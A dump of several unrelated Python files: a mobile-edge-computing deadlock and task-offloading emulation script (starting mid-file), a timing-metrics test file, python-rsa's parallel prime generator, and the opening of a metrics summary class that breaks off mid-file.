{'color': 'olive', 'marker': 'p'},] mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]} offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload reoffload_list = [[], {}] discovering = 0 mec_rtt = {} # {ip: [RTT]} thread_record = [] # keeps track of threads prev_t = 0 # variable for cpu util _cpu = [] # cpu plot list _off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec _off_cloud = 0 # used to keep a count of tasks offloaded to cloud _loc = 0 # used to keep a count of tasks executed locally _inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec deadlock = [1] # keeps count of how many deadlock is resolved _pos = 0 received_task_queue = [] # [[(task_list,wait_time), host_ip], ....] _port_ = 64000 cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud cloud_port = 63000 memory = [] stop = 0 t_track = 1 received_time = [] task_record = {} # keeps record of task reoffloaded task_id = 0 # id for each task reoffloaded shared_resource_lock = threading.Lock() fig = plt.figure() ax1 = fig.add_subplot(231) ax2 = fig.add_subplot(232) ax3 = fig.add_subplot(233) ax4 = fig.add_subplot(234) ax5 = fig.add_subplot(235) ax6 = fig.add_subplot(236) def discovering_group(): global sock1 multicast_group = '224.3.29.71' server_address = ('', 10000) # Create the socket sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Bind to the server address sock1.bind(server_address) # Tell the operating system to add the socket to the multicast group # on all interfaces. group = socket.inet_aton(multicast_group) mreq = struct.pack('4sL', group, socket.INADDR_ANY) sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) def offloading_group(): global sock2 multicast_group = '224.5.5.55' server_address = ('', 20000) # Create the socket sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Bind to the server address sock2.bind(server_address) # Tell the operating system to add the socket to the multicast group # on all interfaces. group = socket.inet_aton(multicast_group) mreq = struct.pack('4sL', group, socket.INADDR_ANY) sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) def _mov_avg(a1): ma1 = [] # moving average list avg1 = 0 # moving average pointwise count = 0 for i in range(len(a1)): count += 1 avg1 = ((count-1)*avg1+a1[i])/count ma1.append(round(avg1, 4)) # cumulative average formula # μ_n=((n-1) μ_(n-1) + x_n)/n return ma1 def percent(value, total): if value > 0: return round((value/total)*100, 2) else: return 0 def plot_offloaded_remote(): keys = ['O-Out', 'Cloud', 'Local', 'O-In'] total = _off_mec + _off_cloud + _loc + _inward_mec val = [percent(_off_mec, total), percent(_off_cloud, total), percent(_loc, total), percent(_inward_mec, total)] cols = ['r', 'g', 'b', 'm'] ypos = ([0, 1, 2, 3]) ''' explode = [] for i in val: if i == max(val): explode.append(0.1) else: explode.append(0) ax2.pie(val, labels=keys, autopct='%.3f%%', wedgeprops=dict(width=0.5), startangle=-40, shadow=True, explode=explode, colors=cols) ''' values = [_off_mec, _off_cloud, _loc, _inward_mec] for i in values: j = values.index(i) ax2.text(j-0.1, values[j], '{}%'.format(val[j]), rotation=0, ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), )) ax2.set_xticks(ypos) ax2.set_xticklabels(keys) ax2.bar(ypos, values, align='center', color=cols, alpha=0.3) ax2.set_title('Local/Remote Execution Report') plt.subplot(ax2) # color=color_code[list(hosts.values()).index(i)] def plot_deadlock(): # cols = ['r'] text = str(deadlock[-1] - 1) + " Deadlock Resolved" ''' wedges, texts, autotexts = ax5.pie(deadlock, shadow=True, autopct=text, textprops=dict(rotation_mode='anchor', color="w", ha='left'), colors=cols) plt.setp(autotexts, size=9, weight="bold") ''' ax5.text(0.5, 0.6, text, rotation=0, size=10, ha="center", va="center", bbox=dict(boxstyle="round", ec=(0., 0., 0.), fc=(0.7, 0.9, 1.))) ax5.text(0.5, 0.45, '{} Tasks Received'.format(_loc+_inward_mec), rotation=0, size=10, ha="center", va="center", bbox=dict(boxstyle="round", ec=(0., 0., 0.), fc=(0.98, 0.96, 0.59), )) # ax5.set_title("Deadlock Resolved Counter") ax5.set_axis_off() plt.subplot(ax5) def plot_memory(): global memory memory.append(round(algo.memory_percent(), 4)) ax6.grid(True) ax6.plot(list(range(len(_mov_avg(memory)))), _mov_avg(memory), linewidth=2, label='Memory', color='m') # ax6.set_title('Moving Memory Utilization') ax6.set_ylabel('Moving Memory') ax6.set_xlabel('Time (seconds)') ax6.fill_between(list(range(len(_mov_avg(memory)))), _mov_avg(memory), 0, alpha=0.5, color='m') ax6.legend() plt.subplot(ax6) def plot_wait_time(): ax1.grid(True) for i in mec_waiting_time: mv = _mov_avg(mec_waiting_time[i]) pt = mv[0:len(mv):int((len(mv) / 7)) + 1] if pt[-1] != mv[-1]: pt.append(mv[-1]) d = list(range(len(mv))) ptx = d[0:len(d):int((len(d) / 7)) + 1] if ptx[-1] != d[-1]: ptx.append(d[-1]) if len(ptx) > len(pt): ptx=ptx[:-1] elif len(ptx) < len(pt): pt=pt[:-1] ax1.plot(ptx, pt, **style1[list(hosts.values()).index(i)], linestyle=(0, (3, 1, 1, 1, 1, 1)), linewidth=2, label=i) ax1.set_title('Waiting Time Queue') ax1.set_ylabel('Moving Wait + RTT') # ax2.set_xlabel('Time (seconds)') ax1.legend() plt.subplot(ax1) def get_mec_rtts(): for i in mec_rtt: mec_rtt[i].append(get_rtt(i)) def plot_rtts(): get_mec_rtts() ax3.grid(True) for i in mec_rtt: mv = _mov_avg(mec_rtt[i]) pt = mv[0:len(mv):int((len(mv) / 7)) + 1] if pt[-1] != mv[-1]: pt.append(mv[-1]) d = list(range(len(mv))) ptx = d[0:len(d):int((len(d) / 7)) + 1] if ptx[-1] != d[-1]: ptx.append(d[-1]) if len(ptx) > len(pt): ptx=ptx[:-1] elif len(ptx) < len(pt): pt=pt[:-1] ax3.plot(ptx, pt, **style1[list(hosts.values()).index(i)], linestyle=(0, (3, 1, 1, 1, 1, 1)), linewidth=2, label=i) ax3.set_title('RTT Utilization over Time') ax3.set_ylabel('Moving RTT') # ax3.set_xlabel('Time (seconds)') ax3.legend() plt.subplot(ax3) def plot_cpu(): global prev_t # get cpu next_t = psutil.cpu_percent(percpu=False) delta = abs(prev_t - next_t) prev_t = next_t _cpu.append(round(delta, 4)) # plot graph ax4.grid(True) ax4.plot(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), linewidth=2, label='CPU') # ax4.set_title('Moving CPU Utilization') ax4.set_ylabel('Moving CPU') ax4.set_xlabel('Time (seconds)') ax4.fill_between(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), 0, alpha=0.5) ax4.legend() plt.subplot(ax4) def plot_graphs(): plot_offloaded_remote() plot_wait_time() plot_rtts() plot_cpu() plot_deadlock() plot_memory() fig.suptitle('MEC Performance During Deadlock Experiment') def show_graphs(): drawnow(plot_graphs) def ip_address(): try: # cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1'] cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2'] address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1] if len(address.strip().split('.')) == 4: return address.strip() else: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except Exception as e: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] def host_ip_set(): global ip_set ip_set = set() for ifaceName in interfaces(): addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])] ip_set.add(', '.join(addresses)) def get_rtt(host): rtt = pc.verbose_ping(host) if rtt: return round(rtt, 4) else: return get_rtt(host) def get_time(): _time_ = [] d = str(dt.datetime.utcnow()).split() _time_ += d[0].split('-') g = d[1].split('.') _time_ += g[0].split(':') _time_.append(g[1]) return _time_ def gcd(a, b): if b == 0: return a return gcd(b, a % b) def _lcm(a, b): return int(a * b / gcd(a, b)) def lcm(_list): return reduce(_lcm, _list) def gosh_dist(_range): return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range def on_connect(connect_client, userdata, flags, rc): # print("Connected with Code :" +str(rc)) # Subscribe Topic from here connect_client.subscribe(node_id) # Callback Function on Receiving the Subscribed Topic/Message def on_message(message_client, userdata, msg): data = str(msg.payload, 'utf-8') if data[0] == 'c': # receive from cloud received_task = data[2:] # send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]]) if received_task in task_record: del task_record[received_task] received_task = '.'.join(received_task.split('.')[:-1]) _client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), ) cooperate['cloud'] += 1 count_task_sent(received_task) elif data[0] == 't': # receive from client received_task = ast.literal_eval(data[2:]) received_task_queue.append(received_task) received_time.append(time.time()) else: print('data: ', data) def connect_to_broker(): global _client global broker_ip username = 'mec' password = 'password' broker_ip = hosts['speaker'] broker_port_no = 1883 _client = mqtt.Client() _client.on_connect = on_connect _client.on_message = on_message _client.username_pw_set(username, password) _client.connect(broker_ip, broker_port_no, 60) _client.loop_forever() def task_time_map(seq, process): exe_seq = [] capacity_sum = 0 for job in process: capacity_sum += process[job]['wcet'] while capacity_sum > 0: for job in seq: if process[job]['wcet'] > 0: exe_seq.append(job) process[job]['wcet'] -= 1 capacity_sum -= 1 return exe_seq total_received_task = 0 def edf(): global total_received_task t_lcm = lcm([tasks[i]['period'] for i in tasks]) t_dead = {i: tasks[i]['deadline'] for i in tasks} sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0])) # print(sorted_dead) ready_task = [] for i in sorted_dead: period = tasks[i[0]]['period'] # print('lcm: ', t_lcm, ' period: ', period) t_range = int(t_lcm/period) last_dead = 0 for j in range(t_range): ready_task.append((i[0], last_dead+tasks[i[0]]['deadline'])) last_dead += period ready_task = sorted(ready_task, key=lambda t: t[1]) print(ready_task) t_time_ = 0 schedule = [] missed = [] register = {i: 0 for i in tasks.keys()} # {ti : amount executed} for i in ready_task: if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]: while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]: t_time_ += 1 # schedule.append(('idle', t_time)) if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]: if t_time_ + tasks[i[0]]['wcet'] <= i[1]: register[i[0]] += 1 t_time_ += tasks[i[0]]['wcet'] schedule.append(i[0]) else: print('Deadline missed: ', i) missed.append(i[0]) # print('s : ', schedule) # print('r: ', register) if len(missed) > 0: # print('missed deadline: ', missed) cooperative_mec(missed) _edf_ = task_time_map(schedule, tasks) total_received_task += len(_edf_) return _edf_ # generate execution sequence def wait_die(processes, avail, n_need, allocat): global deadlock offload = [] # To store execution sequence exec_seq = [] # Make a copy of available resources work = [0] * len(processes) # While all processes are not finished # or system is not in safe state. while 'w' or 0 in work: if 0 in work: ind = work.index(0) i = processes[ind] elif 'w' in work: # print('wk: ', work) ind = work.index('w') i = processes[ind] else: break # print('comparing| process: ', i, _need[i], 'work: ', avail) if not (False in list(np.greater_equal(avail, n_need[i]))): exec_seq.append(i) avail = np.add(avail, allocat[i]) work[ind] = 1 # print('added: ', exec_seq) else: a = list(set(processes) - set(exec_seq) - set(offload)) n = {} for j in a: n[j] = sum(allocat[j]) _max = max(n, key=n.get) # print('work: ', work, 'need: ', _need[_max]) if processes.index(_max) > processes.index(i): # if true, i is older # if process is already waiting then offload process if work[ind] == 'w': offload.append(i) avail = np.array(avail) + np.array(allocat[i]) work[processes.index(i)] = 1 # print('offload reentry: ', i, offload) else: # wait put process to waiting work[processes.index(i)] = 'w' # print('waiting: ', i) else: # abort i offload.append(i) avail = np.array(avail) + np.array(allocat[i]) work[processes.index(i)] = 1 # print('offload: ', i) if len(offload) > 0: print('offloading tasks: ', offload) cooperative_mec(offload) deadlock[0] += 1 print('Execution seq: ', exec_seq) return exec_seq def get_exec_seq(pro): # Number of processes p = len(pro) processes = ['{}_{}'.format(pro[i], i) for i in range(p)] # Available instances of resources avail = [6, 5, 5] n_need = {i: _need[i[:2]] for i in processes} # print('need', n_need) # Resources allocated to processes allot = {i: allocation[i[:2]] for i in processes} # return execution sequence return wait_die(processes, avail, n_need, allot) def calc_wait_time(list_seq): pre = 0 time_dic = {} for i in list_seq: j = i.split('_')[0] # i = 't5_3_3', j = 't5_3' time_dic[i] = round(t_time[j][0] + pre, 3) pre += t_time[j][0] # waiting time = total waiting time ÷ 2 average waiting time might be too tight w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3) send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs return time_dic def compare_local_mec(list_seq): time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq} print('local vs MEC comparison: ', time_compare_dict) execute_mec = [] execute_locally = [] for i in time_compare_dict: if time_compare_dict[i]: execute_locally.append(i) else: execute_mec.append(i) return execute_mec, execute_locally def calculate_mov_avg(ma1, a1): if ma1 in mec_waiting_time: _count = len(mec_waiting_time[ma1]) avg1 = mec_waiting_time[ma1][-1] else: _count = 0 avg1 = 0 _count += 1 avg1 = ((_count - 1) * avg1 + a1) / _count # ma1.append(avg1) #cumulative average formula # μ_n=((n-1) μ_(n-1) + x_n)/n return round(avg1, 4) def send_message(mg): _multicast_group = ('224.3.29.71', 10000) try: # Send data to the multicast group if mg == 'hello': smg = mg + ' ' + str([get_hostname(), ip_address()]) sock1.sendto(str.encode(smg), _multicast_group) print('\nHello message sent') else: sock1.sendto(str.encode(mg), _multicast_group) except Exception as e: print(e) def get_hostname(): cmd = ['cat /etc/hostname'] hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1] return hostname def receive_message(): global hosts while True: if stop == 1: print('Stopped : receive_message') break else: data, address = sock1.recvfrom(1024) _d = data.decode() if _d[:5] == 'hello': _data = ast.literal_eval(_d[6:]) hosts[_data[0]] = _data[1] # print('received: ', hosts) if _data[1] != host_ip: mec_rtt[_data[1]] = [] elif (data.decode()[:6] == 'update') and (discovering == 0): hosts = ast.literal_eval(data.decode()[7:]) for i in hosts: if i != host_ip: mec_rtt[i] = [] elif _d[:2] == 'wt': split_data = _d.split() if split_data[1] != host_ip: # calcuate moving average of mec wait time => w_time = wait time + rtt w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(address[0])) if split_data[1] in mec_waiting_time: mec_waiting_time[split_data[1]].append(w_time) else: mec_waiting_time[split_data[1]] = [w_time] def mec_comparison(): # returns min average waiting for all mecs if len(mec_waiting_time) == 0: return 0 min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time} min_wt = min(min_mec, key=min_mec.get) return min_wt def cooperative_mec(mec_list): global _off_cloud global _off_mec global task_id, task_record for i in mec_list: _host = mec_comparison() if _host == 0: # send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time] _send_task = f"{i.split('_')[0]}.{task_id}" _client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), ) task_record[_send_task] = 'cloud' task_id += 1 _off_cloud += 1 # cloud_register[i.split('_')[0].split('.')[2]] = send_back_host print('\n=========SENDING {} TO CLOUD==========='.format(i)) else: j = i.split('_')[0] _max = np.array([6, 5, 5]) send = 'false' if not (False in list(np.greater_equal(_max, _need[j[:2]]))): send = 'true' # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true': _send_task = f"{j}.{task_id}" send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]])) task_record[_send_task] = 'mec' task_id += 1 _off_mec += 1 # SENDS TASK TO MEC FOR EXECUTION w_send = mec_waiting_time[_host][-1] + 0.001 mec_waiting_time[_host].append(w_send) # adds a new average waiting time print('\n======SENDING {} TO MEC {}========='.format(i, _host)) elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)): _send_task = f"{j}.{task_id}" send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]])) task_record[_send_task] = 'mec' task_id += 1 _off_mec += 1 # SENDS TASK TO MEC FOR EXECUTION w_send = mec_waiting_time[_host][-1] + 0.001 mec_waiting_time[_host].append(w_send) # adds a new average waiting time print('\n======SENDING {} TO MEC {}========='.format(i, _host)) else: _send_task = f"{j}.{task_id}" _client.publish(cloud_ip, str([_send_task, t_time[j][0]]), ) task_record[_send_task] = 'cloud' task_id += 1 _off_cloud += 1 # send_cloud([j, t_time[j][0]]) # # [task_id,exec_time] # cloud_register[j.split('.')[2]] = send_back_host print('\n=========SENDING {} TO CLOUD==========='.format(i)) outward_mec = 0 offload_check = [0,0] def execute_re_offloaded_task(offloaded_task): global outward_mec, offload_check exec_list = get_exec_seq(offloaded_task[0]) outward_mec += len(exec_list) for i in offloaded_task[0]: # i = 't1.1.2.3*1_3' j = i.split('_')[0] time.sleep(offloaded_task[1][j] / 2) # print('j task: ', j) send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0])) clients_record = {} def count_task_sent(task): global clients_record c_id = task.split('.')[2] if c_id in clients_record: clients_record[c_id] += 1 else: clients_record[c_id] = 1 def execute(local): print('\nExecuting :', local) for i in local: j = i.split('_')[0] _t = t_time[j][0] / 2 time.sleep(_t) print('#{}'.format(local.index(i) + 1), ' Executed: ', i) _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), ) count_task_sent(j) print('============== EXECUTION DONE ===============') cooperate = {'mec': 0, 'cloud': 0} def receive_offloaded_task_mec(): # run as a thread global _inward_mec global t_track while True: if stop == 1: print('Stopped: receive_offloaded_task_mec()') break else: data, address = sock2.recvfrom(1024) if len(data.decode()) > 0: da = data.decode().split(' ') if (address[0] not in ip_set) and (da[0] == node_id): # send back to client # send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client if da[1] in task_record: del task_record[da[1]] task_new = '.'.join(da[1].split('.')[:-1]) _client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), ) count_task_sent(da[1]) cooperate['mec'] += 1 else: print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30) elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id): _received = ast.literal_eval(da[2] + da[3]) shared_resource_lock.acquire() task = _received[0] + '*{}'.format(t_track) reoffload_list[0].append(task) reoffload_list[1][task] = _received[1] shared_resource_lock.release() t_track += 1 _inward_mec += 1 def call_execute_re_offload(): global reoffload_list, outward_mec global offload_check while True: if stop == 1: print('Stopped: call_execute_re_offload()') break else: if len(reoffload_list[0]) == 1: t = reoffload_list[0][-1] time.sleep(reoffload_list[1][t] / 2) shared_resource_lock.acquire() reoffload_list[0].remove(t) del reoffload_list[1][t] shared_resource_lock.release() send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0])) outward_mec += 1 offload_check[0] += 1 elif len(reoffload_list[0]) > 1: o = reoffload_list.copy() offload_check[1] += len(o) execute_re_offloaded_task(o) for i in o[0]: shared_resource_lock.acquire() reoffload_list[0].remove(i) del reoffload_list[1][i] shared_resource_lock.release() def send_offloaded_task_mec(msg): _multicast_group = ('224.5.5.55', 20000) try: sock2.sendto(str.encode(msg), _multicast_group) except Exception as e: print(e) def send_email(msg): try: server = smtplib.SMTP_SSL('smtp.gmail.com') server.ehlo() server.login(config.email_address, config.password) subject = 'Deadlock results {}'.format(get_hostname()) # msg = 'Attendance done for {}'.format(_timer) _message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg) server.sendmail(config.email_address, config.send_email, _message) server.quit() print("Email sent!") except Exception as e: print(e) def mec_id(client_ip): _id = client_ip.split('.')[-1] if len(_id) == 1: return '00' + _id elif len(_id) == 2: return '0' + _id else: return _id def run_me(): global discovering global hosts initialization() while True: if len(hosts) == mec_no: print('MEC Details: ', hosts) del hosts[get_hostname()] discovering = 1 break time.sleep(2) start_loop() def save_and_abort(): global stop _id_ = get_hostname()[-1] result = f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} " \ f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} " \ f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} " \ f"\noff_cloud{_id_}_16_{mec_no} = {_off_cloud} " \ f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}" \ f"\nloc{_id_}_16_{mec_no} = {_loc} " \ f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}" \ f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}" \ f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record}" \ f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}" \ f"\noffload_check{_id_}_16_{mec_no} = {offload_check}" list_result = [ f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} ", f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} ", f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} \noff_cloud{_id_}_16_{mec_no} = {_off_cloud} ", f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}", f"\nloc{_id_}_16_{mec_no} = {_loc} ", f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}", f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}", f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record} " f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}", f"\noffload_check{_id_}_16_{mec_no} = {offload_check}" ] cmd = f"echo '' > /home/mec/result/linux/{_id_}_16_{mec_no}datal.py" os.system(cmd) cmd = f"echo '' > /home/mec/result/python/{_id_}_16_{mec_no}datap.py" os.system(cmd) file_ = open(f'/home/mec/result/python/{_id_}_16_{mec_no}datap.py', 'w') for i in list_result: cmd = f'echo "{i}" >> /home/mec/result/linux/{_id_}_16_{mec_no}datal.py' file_.write(i) os.system(cmd) file_.close() send_email(result) if len(task_record) > 0: for _task_ in task_record: task_new = '.'.join(_task_.split('.')[:-1]) _client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), ) stop += 1 ''' for i in thread_record: i.join() ''' _client.loop_stop() time.sleep(1) print('done') os.system('kill -9 {}'.format(os.getpid())) def start_loop(): global _loc global tasks global t_time global stop global node_id print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n') node_id = mec_id(ip_address()) # print('node id: ', node_id) _threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker] for i in _threads_: thread_record.append(Thread(target=i)) Thread(target=i).daemon = True Thread(target=i).start() x = gp.getpass('Press any key to Start...').lower() if x != 'exit': print('========= Waiting for tasks ==========') _time_ = dt.datetime.now() while True: try: if len(received_task_queue) > 0: info = received_task_queue.pop(0) tasks, t_time = info print('EDF List of Processes: ', tasks, '\n') print('\n========= Running Deadlock Algorithm ===========') list_seq = get_exec_seq(edf()) if len(list_seq) > 0: # do only when there is a task in safe sequence wait_list = calc_wait_time(list_seq) print('\nWaiting Time List: ', wait_list) compare_result = compare_local_mec(wait_list) print('\nExecute Locally: ', compare_result[1]) _loc += len(compare_result[1]) # total number of tasks to be executed locally print('\nExecute in MEC: ', compare_result[0]) if len(compare_result[0]) > 0: print('\nSending to cooperative platform') cooperative_mec(compare_result[0]) execute(compare_result[1]) show_graphs() _time_ = dt.datetime.now() else: send_message(str('wt {} 0.0'.format(ip_address()))) time.sleep(.4) now = dt.datetime.now() delta = now - _time_ if delta > dt.timedelta(minutes=4): print('terminating programme 3 mins elapsed') save_and_abort() break except KeyboardInterrupt: print('\nProgramme Terminated') save_and_abort() break def initialization(): global mec_no global host_ip global cloud_ip host_ip = ip_address() try: mec_no = int(input('Number of MECs: ').strip()) cloud_ip = input('Cloud Server IP: ').strip() print('\nCompiling MEC Details') h1 = Thread(target=receive_message) h2 = Thread(target=receive_offloaded_task_mec) thread_record.append(h1) thread_record.append(h2) h1.daemon = True h2.daemon = True h1.start() h2.start() while True: b = input('Send Hello Message (Y/N): ').strip().lower() if b == 'y': send_message('hello') break else: print('\nPlease Type "y" to send Hello message\n') except KeyboardInterrupt: print('\nProgramme Terminated') exit(0) def main(): global algo os.system('clear') print('mec ip: ', ip_address()) algo = psutil.Process() discovering_group() offloading_group() host_ip_set() run_me() if __name__ == "__main__": main()
test_metrics.py
from __future__ import print_function, division, absolute_import import sys import threading import time from distributed import metrics from distributed.compatibility import PY3 from distributed.utils_test import run_for def test_wall_clock(): for i in range(3): time.sleep(0.01) t = time.time() samples = [metrics.time() for j in range(50)] # Resolution deltas = [samples[j + 1] - samples[j] for j in range(len(samples) - 1)] assert min(deltas) >= 0.0, deltas assert max(deltas) <= 1.0, deltas assert any(lambda d: 0.0 < d < 0.0001 for d in deltas), deltas # Close to time.time() assert t - 0.5 < samples[0] < t + 0.5 def test_process_time(): start = metrics.process_time() run_for(0.05) dt = metrics.process_time() - start assert 0.03 <= dt <= 0.2 # All threads counted t = threading.Thread(target=run_for, args=(0.1,)) start = metrics.process_time() t.start() t.join() dt = metrics.process_time() - start assert dt >= 0.05 if PY3: # Sleep time not counted start = metrics.process_time() time.sleep(0.1) dt = metrics.process_time() - start assert dt <= 0.05 def test_thread_time(): start = metrics.thread_time() run_for(0.05) dt = metrics.thread_time() - start assert 0.03 <= dt <= 0.2 if PY3: # Sleep time not counted start = metrics.thread_time() time.sleep(0.1) dt = metrics.thread_time() - start assert dt <= 0.05 if sys.platform == 'linux': # Always per-thread on Linux t = threading.Thread(target=run_for, args=(0.1,)) start = metrics.thread_time() t.start() t.join() dt = metrics.thread_time() - start assert dt <= 0.05
parallel.py
# -*- coding: utf-8 -*- # # Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. '''Functions for parallel computation on multiple cores. Introduced in Python-RSA 3.1. .. note:: Requires Python 2.6 or newer. ''' from __future__ import print_function import multiprocessing as mp import rsa.prime import rsa.randnum def _find_prime(nbits, pipe): while True: integer = rsa.randnum.read_random_int(nbits) # Make sure it's odd integer |= 1 # Test for primeness if rsa.prime.is_prime(integer): pipe.send(integer) return def getprime(nbits, poolsize): '''Returns a prime number that can be stored in 'nbits' bits. Works in multiple threads at the same time. >>> p = getprime(128, 3) >>> rsa.prime.is_prime(p-1) False >>> rsa.prime.is_prime(p) True >>> rsa.prime.is_prime(p+1) False >>> from rsa import common >>> common.bit_size(p) == 128 True ''' (pipe_recv, pipe_send) = mp.Pipe(duplex=False) # Create processes procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send)) for _ in range(poolsize)] [p.start() for p in procs] result = pipe_recv.recv() [p.terminate() for p in procs] return result __all__ = ['getprime'] if __name__ == '__main__': print('Running doctests 1000x or until failure') import doctest for count in range(100): (failures, tests) = doctest.testmod() if failures: break if count and count % 10 == 0: print('%i times' % count) print('Doctests done')
summary.py
import threading import time from collections import defaultdict from typing import Callable, Dict, Mapping, TYPE_CHECKING # TODO: dont want pandas dependencies import numpy as np import pandas as pd if TYPE_CHECKING: from manta_lab.base.packet import SummaryPacket from manta_lab.sdk.interface.interface import Interface class NestedDict: def __init__(self) -> None: self._items = self._create_nested_dict() def _create_nested_dict(self): def _nested_dict(): return defaultdict(_nested_dict) return _nested_dict() def __getitem__(self, key): return self._items.__getitem__(key) def __setitem__(self, key, val): self._items.__setitem__(key, val) def _update(self, _item, d): for k, v in d.items(): if isinstance(v, dict): self._update(_item[k], v) else: _item[k] = v def update(self, d: Dict): self._update(self._items, d) @classmethod def from_flatten(cls, d: Dict): pass def _flatten(self, item, res, key): for k, v in item.items(): new_key = ".".join([key, k]) if isinstance(v, dict): self._flatten(v, res, new_key) else: res[new_key] = v def flatten(self): res = {} # self._flatten(self._items, res, "") for k, v in self._items.items(): try: self._flatten(v, res, k) except AttributeError: res[k] = v return res class Summary: """ Tracks single values for each metric for each run. Summary can handle numpy arrays and PyTorch/TensorFlow tensors. Summary will give you values like min, mean, variance, and percentiles. By default, a metric's summary is the last value of its History. For example, `ml.log({'something': 0.1})` will add a new step to History and update Summary to the latest value. But, in some cases, it's more useful to have the maximum or minimum of a metric instead of the final value. You can set history manually `(ml.summary['accuracy'] = best_acc)`. Examples: ```python ml.init() best_accuracy = 0 for epoch in range(epochs): test_loss, test_accuracy = function() if (test_accuracy > best_accuracy): ml.run.summary["best_accuracy"] = test_accuracy best_accuracy = test_accuracy ``` """ DEBOUNCE_SECONDS = 10 def __init__(self, interface: "Interface"): self.interface = interface self._df = pd.DataFrame() self._items = NestedDict() self._thread = None self._shutdown = False def _summarize(self): df = self._df df = df.loc[:, ~df.columns.str.startswith("_")] if not df.empty: df = df.describe() df = df.replace({np.nan: None}) return df.to_dict() def _exclude_media_items(self, d, res): for k, v in d.items(): if isinstance(v, Mapping): if "_type" not in v: # it means value is not media res[k] = {} self._exclude_media_items(v, res[k]) else: res[k] = v def update(self, d: Dict): if len(d) == 0: return _d = {} self._exclude_media_items(d, _d) # update nested dict self._items.update(_d) flatten_items = self._items.flatten() # update table # TODO: this logic can make too many rows self._df = self._df.append(flatten_items, ignore_index=True) # TODO: 